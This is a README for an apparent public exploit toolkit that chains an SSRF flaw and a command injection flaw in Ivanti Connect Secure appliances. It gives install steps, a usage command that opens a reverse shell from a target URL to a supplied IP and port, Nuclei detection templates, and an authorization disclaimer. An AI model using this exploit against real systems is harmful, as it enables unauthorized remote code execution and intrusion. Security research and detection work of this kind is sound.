CVE-2024-21893 to CVE-2024-21887 Exploit Toolkit## Introduction 🌐
This repository contains a Python script designed to exploit the SSRF vulnerability (CVE-2024-21893) and command injection vulnerability (CVE-2024-21887) in Ivanti Connect Secure appliances. On January 31, 2024, these vulnerabilities were disclosed by Ivanti, and have been actively exploited by chaining them together to achieve unauthenticated remote code execution.
## Background 📜
Ivanti Connect Secure and Ivanti Policy Secure were found to be susceptible to a series of vulnerabilities that could be exploited by an attacker to gain unauthorized access and execute arbitrary code. A detailed analysis by Rapid7, published on January 12, 2024, provides an in-depth look at these vulnerabilities.
Ivanti released a series of mitigations and, as of February 1, 2024, official patches to address the vulnerabilities. It is highly recommended to apply the official patches to secure the systems against these vulnerabilities.
## Exploit Script Usage 🛠️
To use the exploit script, you will need Python 3 and the following dependencies installed:
- `requests`
- `pwncat`
- `rich`
### Installation 📥
1. Clone the repository:
```bash
git clone https://github.com/Chocapikk/CVE-2024-21893-to-CVE-2024-21887
```
2. Navigate to the cloned directory:
```bash
cd CVE-2024-21893-to-CVE-2024-21887
```
3. Install the required dependencies:
```bash
pip install -r requirements.txt
```
### Running the Exploit 🚀
Use the following command to run the exploit script:
```bash
python exploit.py -u <TARGET_URL> -rip <REVERSE_SHELL_IP> -rport <REVERSE_SHELL_PORT>
```
Replace `<TARGET_URL>` with the base URL of the vulnerable server, `<REVERSE_SHELL_IP>` with your IP address for the reverse shell, and `<REVERSE_SHELL_PORT>` with the port you wish to use for the reverse shell.
### Example 📝
```bash
python exploit.py -u https://vulnerable-server.com -rip 192.168.1.10 -rport 1337
```
## Nuclei Templates Usage 🧬
This repository also includes Nuclei templates to detect the SSRF (CVE-2024-21893) and RCE (CVE-2024-21887) vulnerabilities.
### Running Nuclei Templates 🖥️
To use the Nuclei templates, ensure you have Nuclei installed and up-to-date.
1. Detect RCE vulnerability with the `CVE-2024-21893-CVE-2024-21887.yaml` template:
```bash
nuclei -l file.txt -t ./CVE-2024-21893-CVE-2024-21887.yaml
```
2. Detect SSRF vulnerability with the `CVE-2024-21893.yaml` template:
```bash
nuclei -l file.txt -t ./CVE-2024-21893.yaml
```
## Disclaimer ⚠️
This tool is intended for security research and should only be used with explicit authorization from the target organization. Unauthorized use of this tool and its associated techniques for malicious purposes is illegal and unethical.
Remember to use these tools responsibly and ethically, and always have permission before testing someone else's systems. 🛡️
[4.0K] /data/pocs/ebe0bf71726e7a488c16af75bda08e605f8fcbd3
├── [1.4K] CVE-2024-21893-CVE-2024-21887.yaml
├── [1.2K] CVE-2024-21893.yaml
├── [5.0K] exploit.py
├── [2.8K] README.md
└── [ 24] requirements.txt
0 directories, 5 files